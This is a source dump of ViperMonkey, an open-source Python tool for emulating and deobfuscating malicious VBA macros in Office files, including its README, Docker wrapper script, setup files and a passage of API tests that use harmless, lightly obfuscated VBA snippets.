├── .github └── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── .gitignore ├── README.md ├── docker └── dockermonkey.sh ├── docs └── APITutorial.md ├── requirements.txt ├── setup.cfg ├── setup.py ├── tests ├── test_api.py ├── test_bugs.py ├── test_deobfuscation.py └── test_expressions.py └── vipermonkey ├── .prospector.yaml ├── __init__.py ├── api.py ├── core ├── .prospector.yaml ├── __init__.py ├── antlr_vba │ ├── __init__.py │ ├── antlr4.bat │ ├── grun.bat │ ├── makevba.bat │ ├── testvba.py │ └── vba.g4 ├── comments_eol.py ├── curses_ascii.py ├── deobfuscation.py ├── excel.py ├── expressions.py ├── filetype.py ├── from_unicode_str.py ├── function_call_visitor.py ├── function_defn_visitor.py ├── function_import_visitor.py ├── identifiers.py ├── let_statement_visitor.py ├── lhs_var_visitor.py ├── lib_functions.py ├── literals.py ├── logger.py ├── loop_transform.py ├── meta.py ├── modules.py ├── operators.py ├── procedures.py ├── read_ole_fields.py ├── reserved.py ├── statements.py ├── strip_lines.py ├── stubbed_engine.py ├── tagged_block_finder_visitor.py ├── utils.py ├── var_defn_visitor.py ├── var_in_expr_visitor.py ├── vb_str.py ├── vba_constants.py ├── vba_context.py ├── vba_library.py ├── vba_lines.py ├── vba_object.py └── visitor.py ├── export_all_excel_sheets.py ├── export_doc_text.py ├── v_test.py ├── vbashell.py └── vmonkey.py /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | 5 | --- 6 | 7 | **Describe the bug** 8 | A clear and concise description of what the bug is. 9 | 10 | **To Reproduce** 11 | Steps to reproduce the behavior: 12 | 1. Go to '...' 13 | 2. Click on '....' 14 | 3. Scroll down to '....' 15 | 4. See error 16 | 17 | **Expected behavior** 18 | A clear and concise description of what you expected to happen. 19 | 20 | **Screenshots** 21 | If applicable, add screenshots to help explain your problem. 22 | 23 | **Desktop (please complete the following information):** 24 | - OS: [e.g. iOS] 25 | - Browser [e.g. chrome, safari] 26 | - Version [e.g. 22] 27 | 28 | **Smartphone (please complete the following information):** 29 | - Device: [e.g. iPhone6] 30 | - OS: [e.g. iOS8.1] 31 | - Browser [e.g. stock browser, safari] 32 | - Version [e.g. 22] 33 | 34 | **Additional context** 35 | Add any other context about the problem here. 36 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | 5 | --- 6 | 7 | **Is your feature request related to a problem? Please describe.** 8 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 9 | 10 | **Describe the solution you'd like** 11 | A clear and concise description of what you want to happen. 12 | 13 | **Describe alternatives you've considered** 14 | A clear and concise description of any alternative solutions or features you've considered. 15 | 16 | **Additional context** 17 | Add any other context or screenshots about the feature request here. 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by .ignore support plugin (hsz.mobi) 2 | ### Python template 3 | # Byte-compiled / optimized / DLL files 4 | __pycache__/ 5 | *.py[cod] 6 | *$py.class 7 | 8 | # C extensions 9 | *.so 10 | 11 | # Distribution / packaging 12 | .Python 13 | env/ 14 | build/ 15 | develop-eggs/ 16 | dist/ 17 | downloads/ 18 | eggs/ 19 | .eggs/ 20 | lib/ 21 | lib64/ 22 | parts/ 23 | sdist/ 24 | var/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .coverage 43 | .coverage.* 44 | .cache 45 | nosetests.xml 46 | coverage.xml 47 | *,cover 48 | .hypothesis/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | 58 | # Flask stuff: 59 | instance/ 60 | .webassets-cache 61 | 62 | # Scrapy stuff: 63 | .scrapy 64 | 65 | # Sphinx documentation 66 | docs/_build/ 67 | 68 | # PyBuilder 69 | target/ 70 | 71 | # IPython Notebook 72 | .ipynb_checkpoints 73 | 74 | # pyenv 75 | .python-version 76 | 77 | # celery beat schedule file 78 | celerybeat-schedule 79 | 80 | # dotenv 81 | .env 82 | 83 | # virtualenv 84 | venv/ 85 | ENV/ 86 | 87 | # Spyder project settings 88 | .spyderproject 89 | 90 | # Rope project settings 91 | .ropeproject 92 | 93 | # PyCharm 94 | .idea/ 95 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ViperMonkey 2 | =========== 3 | 4 | ViperMonkey is a VBA Emulation engine written in Python, designed to analyze 5 | and deobfuscate malicious VBA Macros contained in Microsoft Office files 6 | (Word, Excel, PowerPoint, Publisher, etc). 7 | 8 | See the article "[Using VBA Emulation to Analyze Obfuscated Macros](http://decalage.info/vba_emulation)", 9 | for real-life examples of malware deobfucation with ViperMonkey. 10 | 11 | ViperMonkey was also demonstrated at the Black Hat Europe 2019 conference: 12 | see the [slides](https://decalage.info/en/bheu2019) 13 | and [video](https://youtu.be/l5sMPGjtKn0?list=PLH15HpR5qRsXiPOP3gxN6ultoj0rAR6Yn&t=1118) (at 18:38). 14 | 15 | ViperMonkey was created by [Philippe Lagadec](https://github.com/decalage2) in 2015-2016, and the project 16 | is maintained in the repository https://github.com/decalage2/ViperMonkey. 17 | Since November 2017, most of the development is done by [Kirk Sayre](https://github.com/kirk-sayre-work) 18 | and other contributors in the repository https://github.com/kirk-sayre-work/ViperMonkey. 19 | The main repository is synchronised regularly, but cutting edge improvements are usually 20 | available first in Kirk's version. 21 | 22 | **Quick links:** 23 | [Report Issues/Suggestions/Questions](https://github.com/decalage2/ViperMonkey/issues) - 24 | [Contact the Author](http://decalage.info/contact) - 25 | [Repository](https://github.com/decalage2/ViperMonkey) - 26 | [Updates on Twitter](https://twitter.com/decalage2) - 27 | [API Tutorial](docs/APITutorial.md) 28 | 29 | 30 | **DISCLAIMER**: 31 | - ViperMonkey is an experimental VBA Engine targeted at analyzing maldocs. It works on some but not all maldocs. 32 | - VBA parsing and emulation is *extremely* slow for now (see the speedup section for how to improve the speed). 33 | - VBA Emulation is hard and complex, because of all the features of the VBA language, of Microsoft 34 | Office applications, and all the DLLs and ActiveX objects that can be called from VBA. 35 | - This open-source project is only developed on my scarce spare time, so do not expect 36 | miracles. Any help from you will be very appreciated! 37 | 38 | Download and Install: 39 | --------------------- 40 | 41 | **Easy Install** 42 | 43 | 1. Install docker. 44 | 2. Run `docker/dockermonkey.sh MYFILE` to analyze file MYFILE. 45 | 46 | dockermonkey.sh wil automatically pull down a preconfigured docker container, update ViperMonkey to 47 | the latest version in the container, and then analyze MYFILE by running ViperMonkey in the 48 | container. No other packages or configuration will need to be performed. 49 | 50 | For information on using dockermonkey.sh run `docker/dockermonkey.sh -h`. 51 | 52 | **Installation using PyPy (recommended)** 53 | 54 | For performance reasons, it is highly recommended to use PyPy (5x faster), but it is 55 | also possible to run Vipermonkey with the normal Python interpreter 56 | (CPython) if you cannot use PyPy. 57 | 58 | 1. If PyPy is not installed on your system, see http://pypy.org/download.html and download **PyPy 2.7**. (not 3.x) 59 | 2. Check if pip is installed for pypy: run `pypy -m pip` 60 | 3. If pip is not installed yet, run `pypy -m ensurepip` on Windows, or `sudo -H pypy -m ensurepip` on Linux/Mac 61 | 4. Make sure pip is up-to-date, by running `pypy -m pip install -U pip` 62 | 5. Download the archive from the repository: https://github.com/decalage2/ViperMonkey/archive/master.zip 63 | 6. Extract it in the folder of your choice, and open a shell/cmd window in that folder. 64 | 7. Under Ubuntu install pypy-dev (sudo apt-get install pypy-dev). 65 | 8. Install dependencies by running `pypy -m pip install -U -r requirements.txt` on Windows, or `sudo -H pypy -m pip install -U -r requirements.txt` on Linux/Mac 66 | 9. Check that Vipermonkey runs without error: `pypy vmonkey.py` 67 | 68 | **Installation using CPython** 69 | 70 | 1. Make sure you have the latest Python 2.7 installed: https://www.python.org/downloads/ 71 | 2. If you have both Python 2 and 3 versions installed, use `pip2` instead of `pip` in the 72 | following commands, to install in Python 2 and not 3. 73 | 4. Make sure pip is up-to-date, by running `pip install -U pip` 74 | 2. Use pip to download and install vipermonkey with all its dependencies, 75 | by running the following command on Windows: 76 | ``` 77 | pip install -U https://github.com/decalage2/ViperMonkey/archive/master.zip 78 | ``` 79 | On Linux/Mac: 80 | ``` 81 | sudo -H pip install -U https://github.com/decalage2/ViperMonkey/archive/master.zip 82 | ``` 83 | 3. Check that Vipermonkey runs without error: open a shell/cmd window 84 | in any directory, an simply run `vmonkey` 85 | 86 | 87 | Usage: 88 | ------ 89 | 90 | To run ViperMonkey in a Docker container with the `-s`, `--jit`, and 91 | `--iocs` options do: 92 | 93 | ```text 94 | docker/dockermonkey.sh 95 | ``` 96 | 97 | To parse and interpret VBA macros from a document, use the vmonkey script: 98 | 99 | ```text 100 | vmonkey.py 101 | ``` 102 | 103 | To make analysis faster (see the Speedup section), do: 104 | 105 | ```text 106 | pypy vmonkey.py -s 107 | ``` 108 | 109 | *Note:* It is recommended to always use the `-s` option. When given 110 | the `-s` option ViperMonkey modifies some difficult to parse Visual 111 | Basic language constructs so that the ViperMonkey parser can 112 | correctly parse the input. 113 | 114 | If the output is too verbose and too slow, you may reduce the logging level using the 115 | -l option: 116 | 117 | ```text 118 | vmonkey.py -l warning 119 | ``` 120 | 121 | If the sample being analyzed has long running loops that are causing 122 | emulation to be unacceptably slow, use the `--jit` option to convert 123 | VB loops directly to Python in a JIT fashion during emulation. 124 | 125 | ```text 126 | vmonkey.py --jit 127 | ``` 128 | 129 | *Note:* ViperMonkey's Python JIT loop conversion converts VB loops to 130 | Python and `evals` the generated Python code. While the Python 131 | conversion process is based on the parsed AST (not directly on the VB 132 | text) and VB data values are escaped/converted/modified to become 133 | valid in Python, any use of `eval` in Python potentially introduces a 134 | security risk. If this is a concern the `dockermonkey.sh` script can be 135 | used to run ViperMonkey in a sandboxed manner. `dockermonkey.sh` runs 136 | ViperMonkey in a fresh Docker container on each run (no file system 137 | modifications persist between runs) and networking is turned off in 138 | the Docker container. 139 | 140 | Sometimes a malicious VBScript or Office file will generate IOCs 141 | during execution that are not used or that ViperMonkey does not see 142 | used. These intermediate IOCs are tracked by ViperMonkey during the 143 | emulation process and can be reported with the `--iocs` option. 144 | 145 | ```text 146 | vmonkey --iocs 147 | ``` 148 | 149 | Note that one of the intermediate IOCs reported by ViperMonkey is 150 | injected shell code bytes. If the sample under analysis performs 151 | process injection directly in VB, ViperMonkey will report the injected 152 | byte values as an intermediate IOC with the `--iocs` flag. These byte 153 | values can then be written into a raw shell code file which can be 154 | further analyzed with a shell code emulator. 155 | 156 | **oletools Version** 157 | 158 | ViperMonkey requires the most recent version of 159 | [oletools](https://github.com/decalage2/oletools), at least v0.52.3. Make sure to either install the most recent oletools 160 | version by running `pip install -U oletools`, or make sure 161 | the most recent oletools install directory appears in PYTHONPATH, or 162 | install the most recent development version of oletools using pip as described 163 | [here](https://github.com/decalage2/oletools/wiki/Install#how-to-install-the-latest-development-version). 164 | 165 | **Speedup** 166 | 167 | ***pypy*** 168 | 169 | The parsing library used by default in ViperMonkey can take a long 170 | time to parse some samples. ViperMonkey can be sped up considerably (~5 171 | times faster) by running ViperMonkey using [pypy](https://pypy.org/) 172 | rather than the regular Python interpreter. To use pypy do the 173 | following: 174 | 175 | 1. Install pypy following the instructions [here](https://pypy.org/download.html). 176 | 2. Install the following Python packages. This can be done by 177 | downloading the .tar.gz for each package and running 'sudo pypy 178 | setup.py install' (note the use of pypy rather than python) for 179 | each package. 180 | 1. [setuptools](https://pypi.python.org/pypi/setuptools) 181 | 2. [colorlog](https://pypi.python.org/pypi/colorlog) 182 | 3. [olefile](https://pypi.python.org/pypi/olefile) 183 | 4. [prettytable](https://pypi.python.org/pypi/PrettyTable) 184 | 5. [pyparsing](https://pypi.python.org/pypi/pyparsing/2.2.0) 185 | 186 | ***Stripping Useless Statements*** 187 | 188 | The "-s" ViperMonkey command line option tells VipeMonkey to strip out 189 | useless statements from the Visual Basic macro code prior to parsing 190 | and emulation. For some maldocs this can significantly speed up 191 | analysis. 192 | 193 | **Emulating File Writes** 194 | 195 | ViperMonkey emulates some file writing behavior. The SHA256 hash of 196 | dropped files is reported in the ViperMonkey analysis results and the 197 | actual dropped files are saved in the directory MALDOC_artifacts/, 198 | where MALDOC is the name of the analyzed maldoc file. 199 | 200 | ViperMonkey also searches Office 97 and Office 2007+ files for 201 | embedded PE files. These are automatically extracted and reported as 202 | dropped files in the MALDOC_artifacts/ directory. 203 | 204 | **Emulating Specific VBA Functions** 205 | 206 | By default ViperMonkey emulates maldoc behavior starting from standard 207 | macro auto run function (like AutoOpen, Document_Open, Document_Close, 208 | etc.). In some cases you may want to emulate the behavior starting 209 | from a non-standard auto run function. This is supported via the -i 210 | command line option. To emulate maldoc behavior starting from function 211 | Foo, use the command line option '-i Foo'. To emulate behavior 212 | starting from multiple non-standard entry points, use the command line 213 | option '-i "Foo,Bar,Baz"' (note that the entry point function names 214 | are comma seperated and must appear in a double quoted string). 215 | 216 | 217 | [//]: # (Home page http://www.decalage.info/vipermonkey) 218 | [//]: # (Documentation https://github.com/decalage2/ViperMonkey/wiki) 219 | [//]: # (Download/Install https://github.com/decalage2/ViperMonkey/wiki/Install) 220 | 221 | 222 | API Interface: 223 | -------------- 224 | 225 | ViperMonkey also includes a Python API interface that can be used for 226 | finer control emulation of your sample or for integration 227 | into an existing project. 228 | 229 | Please see the [API Tutorial](docs/APITutorial.md) for more information. 230 | 231 | 232 | News 233 | ---- 234 | 235 | - **2018-03-22 v0.06**: new features and bug fixes contributed by Kirk Sayre 236 | - 2018-3: 237 | - Added support for parsing some technically invalid VBA statements. 238 | - Additional parsing fixes. 239 | - Added support for starting emulation at non-standard functions. 240 | - 2018-2: 241 | - Added support for Environ, IIf, Base64DecodeString, CLng, Close, Put, Run, InStrRev, 242 | LCase, RTrim, LTrim, AscW, AscB, and CurDir functions. 243 | - 2018-1 244 | - Added emulation support for saving dropped files. 245 | - Added support for For Each loops. 246 | - Added support for While Wend loops. 247 | - Handle 'Exit Do' instructions. 248 | - 2018-01-12 v0.05: a lot of new features and bug fixes contributed by Kirk Sayre 249 | - 2017-12-15: 250 | - Added support for Select and Do loops. 251 | - Added support for 'End Sub' and 0 argument return statements. 252 | - Added support for #if constructs. 253 | - Each VBA stream is now parsed in a separate thread (up to the # of machine cores). 254 | - 2017-11-28: 255 | - Added parsing for private type declarations. 256 | - Report calls to CreateProcessA in final report. 257 | - Handle Application.Run() of locally defined methods. 258 | - 2017-11-23: 259 | - Added VBA functions Abs, Fix, Hex, String, CByte, Atn, Dir, RGB, Log, Cos, Exp, Sin, Str, and Val. 260 | - Added support for 'Exit Function' operator. 261 | - Changed math operators to also work with string representations of integers. 262 | - Added a configurable iteration limit on loops. 263 | - 2017-11-14: 264 | - Added support for InStr, Replace, Sgn, Sqr, UBound, LBound, Trim, StrConv, Split, StrReverse, and Int VB functions. 265 | - Added support for string character subscripting. 266 | - Added support for negative integer literals. 267 | - Added support for if-then-else statements. 268 | - Added support for Const and initial values for global variable declarations. 269 | - Handle assignments of boolean expressions to variables. 270 | - 2017-11-03: 271 | - Added support for Left(), Right(), Array(), and BuiltInDocumentProperties() functions. 272 | - Added support for global variables. 273 | - Fixed some parse errors. 274 | - Added analysis of AutoClose() functions. 275 | - 2016-09-26 v0.02: First published version 276 | - 2015-02-28 v0.01: [First development version](https://twitter.com/decalage2/status/571778745222242305) 277 | - see changelog in source code for more info. 278 | 279 | How to Suggest Improvements, Report Issues or Contribute: 280 | --------------------------------------------------------- 281 | 282 | This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug 283 | report is welcome. 284 | 285 | To suggest improvements, report a bug or any issue, please use the 286 | [issue reporting page](https://github.com/decalage2/ViperMonkey/issues), providing all the 287 | information and files to reproduce the problem. 288 | 289 | You may also [contact the author](http://decalage.info/contact) directly to provide feedback. 290 | 291 | The code is available in [a GitHub repository](https://github.com/decalage2/ViperMonkey). You may use it 292 | to submit enhancements using forks and pull requests. 293 | 294 | License 295 | ------- 296 | 297 | This license applies to the ViperMonkey package, apart from the thirdparty folder which contains third-party files 298 | published with their own license. 299 | 300 | The ViperMonkey package is copyright (c) 2015-2020 Philippe Lagadec (http://www.decalage.info) 301 | 302 | All rights reserved. 303 | 304 | Redistribution and use in source and binary forms, with or without modification, 305 | are permitted provided that the following conditions are met: 306 | 307 | * Redistributions of source code must retain the above copyright notice, this 308 | list of conditions and the following disclaimer. 309 | * Redistributions in binary form must reproduce the above copyright notice, 310 | this list of conditions and the following disclaimer in the documentation 311 | and/or other materials provided with the distribution. 312 | 313 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 314 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 315 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 316 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 317 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 318 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 319 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 320 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 321 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 322 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 323 | 324 | -------------------------------------------------------------------------------- /docker/dockermonkey.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ $1 == "-h" || $# -eq 0 ]]; then 4 | echo "Usage: dockermonkey.sh FILE [JSON_FILE] [-i ENTRY]" 5 | echo "FILE is the VBA/VBScript file to analyze." 6 | echo "If JSON_FILE is given JSON analysis results will be saved in JSON_FILE." 7 | echo "If '-i ENTRY' is given emulation will start with VBA/VBScript function ENTRY." 8 | exit 9 | fi 10 | 11 | if [ "$(uname)" == "Darwin" ]; then 12 | echo "[*] User running on a Mac" 13 | if [ "$(docker-machine status)" == "Stopped" ]; then 14 | echo "[*] 'docker-machine' is Stopped. Starting it and instantiating the environment." 15 | docker-machine start 16 | docker-machine env 17 | eval $(docker-machine env) 18 | fi 19 | fi 20 | 21 | echo "[*] Running 'docker ps' to see if script has required privileges to run..." 22 | docker ps 23 | 24 | if [ $? -ne 0 ]; then 25 | echo "[!] 'docker ps' failed to run - you may not have the privileges to run docker. Try using sudo." 26 | exit 27 | fi 28 | 29 | if [[ $(docker ps -f status=running -f ancestor=haroldogden/vipermonkey -l | tail -n +2) ]]; then 30 | echo "[+] Other ViperMonkey containers are running!" 31 | fi 32 | 33 | echo "[*] Pulling and starting container..." 34 | docker pull haroldogden/vipermonkey:latest 35 | docker_id=$(docker run --rm -d -t haroldogden/vipermonkey:latest) 36 | 37 | echo "[*] Attempting to copy file $1 into container ID $docker_id" 38 | 39 | file_basename=$(basename "$1") 40 | 41 | # TODO: Remove this after base Docker image is updated. 42 | #echo "[*] Installing exiftool..." 43 | #docker exec $docker_id sh -c 'apt-get install -y libimage-exiftool-perl' 44 | 45 | echo "[*] Starting openoffice listener for file content conversions..." 46 | docker exec $docker_id sh -c '/usr/lib/libreoffice/program/soffice.bin --headless --invisible --nocrashreport --nodefault --nofirststartwizard --nologo --norestore --accept="socket,host=127.0.0.1,port=2002,tcpNoDelay=1;urp;StarOffice.ComponentContext" &' 47 | 48 | echo "[*] Checking for ViperMonkey and dependency updates..." 49 | docker exec $docker_id sh -c "cd /opt;for d in *; do cd \$d; git pull > /dev/null 2>&1; cd /opt; done" 50 | 51 | echo "[*] Disabling network connection for container ID $docker_id" 52 | docker network disconnect bridge $docker_id 53 | 54 | docker cp "$1" "$docker_id:/root/$file_basename" 55 | 56 | # Figure out arguments. 57 | entry="" 58 | json="" 59 | json_file="" 60 | 61 | # Entry point with no JSON file? 62 | if [[ $# -ge 3 && $2 == "-i" ]]; then 63 | entry="-i $3" 64 | elif [ $# -eq 2 ]; then 65 | # Just JSON file. 66 | json="-o /root/report.json" 67 | json_file=$2 68 | fi 69 | 70 | # JSON file with entry point? 71 | if [[ $# -ge 4 && $3 == "-i" ]]; then 72 | entry="-i $4" 73 | json="-o /root/report.json" 74 | json_file=$2 75 | fi 76 | 77 | # Run ViperMonkey in the docker container. 78 | docker exec $docker_id sh -c "/opt/ViperMonkey/vipermonkey/vmonkey.py -s --ioc --jit '/root/$file_basename' $json $entry" 79 | 80 | # Copy out the JSON analysis report if needed. 81 | if [ "$json_file" != "" ]; then 82 | docker cp "$docker_id:/root/report.json" "$json_file" 83 | fi 84 | 85 | # Zip up dropped files if there are any. 86 | docker exec $docker_id sh -c "touch /root/test.zip ; [ -d \"/root/${file_basename}_artifacts/\" ] && zip -r --password=infected - /root/${file_basename}_artifacts/ > /root/test.zip" 87 | docker cp "$docker_id:/root/test.zip" test.zip 88 | if [ ! -s test.zip ]; then rm test.zip; else mv test.zip ${file_basename}_artifacts.zip; echo "[*] Dropped files are in ${file_basename}_artifacts.zip"; fi 89 | 90 | echo "[*] Done - Killing docker container $docker_id" 91 | docker stop $docker_id > /dev/null 92 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | oletools>=0.56.1,<=0.60.1 # oletools from 0.54.2 to 0.56 required cryptography, incompatible with PyPy. oletools 0.56.1+ does not require it anymore. 2 | olefile 3 | prettytable 4 | colorlog 5 | colorama 6 | pyparsing==2.2.0 # pyparsing 2.4.0 triggers a MemoryError on some samples (issue #58). pyparsing 2.3.0 parses some constructs differently and breaks things. 7 | xlrd2 8 | xlrd 9 | unidecode==1.2.0 10 | # regex is not installable on PyPy+Windows, so we only require it if the platform is not Windows or not PyPy: 11 | regex ; platform_python_implementation!="PyPy" or platform_system!="Windows" 12 | -------------------------------------------------------------------------------- /setup.cfg: -------------------------------------------------------------------------------- 1 | [aliases] 2 | test=pytest 3 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Installs ViperMonkey using pip, setuptools or distutils 4 | 5 | To install this package, run: 6 | pip install -e . 7 | 8 | Or: 9 | python setup.py install 10 | 11 | Installation using pip is recommended, to create scripts to run vmonkey 12 | and vbashell from any directory. 13 | """ 14 | 15 | #--- CHANGELOG ---------------------------------------------------------------- 16 | 17 | # 2016-12-14 v0.04 PL: - replaced scripts by entry points (issue #17) 18 | # 2018-08-17 v0.07 PL: - added required dependency unidecode 19 | # 2021-04-10 v1.0.3 PL: - changed oletools version to >=0.56.1 20 | 21 | #--- TODO --------------------------------------------------------------------- 22 | 23 | 24 | #--- IMPORTS ------------------------------------------------------------------ 25 | 26 | try: 27 | from setuptools import setup 28 | except ImportError: 29 | from distutils.core import setup 30 | 31 | # --- ENTRY POINTS ------------------------------------------------------------ 32 | 33 | # Entry points to create convenient scripts automatically 34 | 35 | entry_points = { 36 | 'console_scripts': [ 37 | 'vmonkey=vipermonkey.vmonkey:main', 38 | 'vbashell=vipermonkey.vbashell:main', 39 | ], 40 | } 41 | 42 | 43 | setup( 44 | name="vipermonkey", 45 | version="1.0.3", 46 | description=( 47 | "ViperMonkey is a VBA Emulation engine written in Python, designed to " 48 | "analyze and deobfuscate malicious VBA Macros contained in Microsoft " 49 | "Office files (Word, Excel, PowerPoint, Publisher, etc)."), 50 | long_description=open("README.md").read(), 51 | install_requires=[ 52 | # oletools from 0.54.2 to 0.56 required cryptography, incompatible with PyPy. oletools 0.56.1+ does not require it anymore. 53 | # Moreover, oletools 0.56.1+ does not trigger antivirus false positives anymore 54 | 'oletools >= 0.56.1', 55 | "olefile", 56 | "prettytable", 57 | "colorlog", 58 | "colorama", 59 | "pyparsing==2.2.0", # pyparsing 2.4.0 triggers a MemoryError on some samples (issue #58). pyparsing 2.3.0 parses some constructs differently and breaks things. 60 | "unidecode==1.2.0", 61 | "xlrd", 62 | # regex is not installable on PyPy+Windows, so we only require it if the platform is not Windows or not PyPy: 63 | 'regex; platform_python_implementation!="PyPy" or platform_system!="Windows"', 64 | ], 65 | packages=["vipermonkey", "vipermonkey.core"], 66 | setup_requires=["pytest-runner"], 67 | tests_require=["pytest"], 68 | entry_points=entry_points, 69 | author="Philippe Lagadec", 70 | url="https://github.com/decalage2/ViperMonkey", 71 | license="BSD", 72 | download_url="https://github.com/decalage2/ViperMonkey", 73 | ) 74 | -------------------------------------------------------------------------------- /tests/test_api.py: -------------------------------------------------------------------------------- 1 | """Tests to ensure our API works as described in documentation.""" 2 | 3 | from textwrap import dedent 4 | 5 | import pytest 6 | 7 | import vipermonkey 8 | from vipermonkey.core import * 9 | 10 | 11 | def test_basic_eval(): 12 | assert vipermonkey.eval('2') == 2 13 | assert vipermonkey.eval('2 + 2') == 4 14 | assert vipermonkey.eval('Chr(36)') == '$' 15 | assert vipermonkey.eval('"w" & Chr(111) & "rl" & Chr(123 Xor 31)') == 'world' 16 | assert vipermonkey.eval('Chr(71 Xor 18) & "2" & Chr(84 Xor 19)') == 'U2G' 17 | 18 | vba_code = dedent(''' 19 | Dim m1, m2, m3 As String 20 | m1 = "he" & "ll" & Chr(111) & " " 21 | m2 = "w" & Chr(111) & "rl" & Chr(123 Xor 31) 22 | m3 = "!!!" 23 | m1 & m2 & m3 24 | ''') 25 | assert vipermonkey.eval(vba_code) == 'hello world!!!' 26 | 27 | 28 | def test_eval_with_context(): 29 | vba_code = dedent(''' 30 | Dim m1, m2, m3, result As String 31 | m1 = "he" & "ll" & Chr(111) & " " 32 | m2 = "w" & Chr(111) & "rl" & Chr(123 Xor 31) 33 | m3 = "!!!" 34 | result = m1 & m2 & m3 35 | ''') 36 | context = vipermonkey.Context() 37 | vipermonkey.eval(vba_code, context=context) 38 | assert context.locals == {'m1': 'hello ', 'result': 'hello world!!!', 'm3': '!!!', 'm2': 'world'} 39 | assert context['result'] == 'hello world!!!' 40 | 41 | 42 | def test_module(): 43 | """Tests Module interaction.""" 44 | # Test iterating functions. 45 | vba_code = dedent(''' 46 | Attribute VB_Name = "ThisDocument" 47 | Attribute VB_Base = "1Normal.ThisDocument" 48 | 49 | Sub Document_Open() 50 | On Error Resume Next 51 | Dim message As String 52 | message = PrintHello("Jamie") 53 | MsgBox message 54 | End Sub 55 | 56 | Function PrintHello(person As String) As String 57 | Dim m1 As String 58 | m1 = "he" & "ll" & Chr(111) & " " 59 | PrintHello = m1 & person 60 | End Function 61 | ''') 62 | module = vipermonkey.Module(vba_code) 63 | assert sorted(proc.name for proc in module.procedures) == ['Document_Open', 'PrintHello'] 64 | 65 | # Test iterating code_blocks. 66 | expected_code_blocks = [ 67 | (Attribute_Statement, 'Attribute VB_Name = "ThisDocument"\n'), 68 | (Attribute_Statement, 'Attribute VB_Base = "1Normal.ThisDocument"\n'), 69 | (Sub, dedent('''\ 70 | Sub Document_Open() 71 | On Error Resume Next 72 | Dim message As String 73 | message = PrintHello("Jamie") 74 | MsgBox message 75 | End Sub 76 | ''')), 77 | (Function, dedent('''\ 78 | Function PrintHello(person As String) As String 79 | Dim m1 As String 80 | m1 = "he" & "ll" & Chr(111) & " " 81 | PrintHello = m1 & person 82 | End Function 83 | ''')) 84 | ] 85 | for (expected_type, expected_code), code_block in zip(expected_code_blocks, module.code_blocks): 86 | assert code_block.type == expected_type 87 | assert str(code_block) == expected_code 88 | 89 | # Test evaluating directly with code_blocks 90 | for code_block in module.code_blocks: 91 | if code_block.type == vipermonkey.Function and code_block.name == 'PrintHello': 92 | assert code_block.eval(params=['Bob']) == 'hello Bob' 93 | break 94 | else: 95 | pytest.fail('Failed to find PrintHello() function.') 96 | 97 | # Test evaluating using prefilled context. 98 | context = vipermonkey.Context() 99 | module.load_context(context) 100 | assert vipermonkey.eval('PrintHello("Bob")', context=context) == 'hello Bob' 101 | 102 | 103 | def test_file_extraction(): 104 | vba_code = dedent(r''' 105 | Sub WriteFile(data As String) 106 | Dim a, b, c As String 107 | a = "Scr" 108 | b = "ipting" & Chr(46) & "FileSy" 109 | c = "st" & Chr(69) & "mObject" 110 | Dim fso As Object 111 | Set fso = CreateObject(a & b & c) 112 | Dim Fileout As Object 113 | Dim url As String 114 | url = "c:\users\public\" & "documents\hello.txt" 115 | Set Fileout = fso.CreateTextFile(url, True, True) 116 | Fileout.Write data 117 | Fileout.Close 118 | End Sub 119 | 120 | WriteFile("This " & "is some" & " file data!") 121 | ''') 122 | context = vipermonkey.Context() 123 | vipermonkey.eval(vba_code, context=context) 124 | assert context.open_files == {} 125 | assert context.closed_files == {'c:\\users\\public\\documents\\hello.txt': 'This is some file data!'} 126 | 127 | 128 | def test_function_replacement(): 129 | vba_code = dedent(r''' 130 | Public Function Base64Decode(ByVal s As String) As Byte() 131 | ' Some complex code 132 | End Function 133 | 134 | Public Sub Document_Open() 135 | Dim result As String 136 | result = Base64Decode("aGVsbG8gd29ybGQh") 137 | Enc Sub 138 | ''') 139 | 140 | def replaced_base64(context, params): 141 | # NOTE: We can update the context here if the function has a symptom 142 | return base64.b64decode(params[0]) 143 | 144 | context = vipermonkey.Context() 145 | module = 